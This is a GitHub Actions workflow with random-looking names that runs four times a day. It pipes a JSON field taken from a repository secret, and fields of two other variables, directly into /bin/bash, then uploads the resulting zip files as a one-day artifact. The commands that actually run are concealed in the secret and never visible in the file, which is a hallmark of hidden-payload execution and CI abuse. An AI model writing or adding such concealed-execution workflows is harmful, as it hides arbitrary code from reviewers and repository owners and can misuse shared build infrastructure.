name: huimuxiaocui
on:
  workflow_dispatch:

  schedule:
    - cron: '26 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: huimuxiaocui
        env:
          vhn6: ${{ secrets.vhn6 }}
        run: |
          printf '%s' "$vhn6" | jq -r .u12 | /bin/bash
          printf '%s' "$xv91826" | jq -r .qrhei72 | /bin/bash
          echo $dzdu434 | jq -r .kfxsv73139 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: fqKRiZQv
          path: "*.zip"
          retention-days: 1
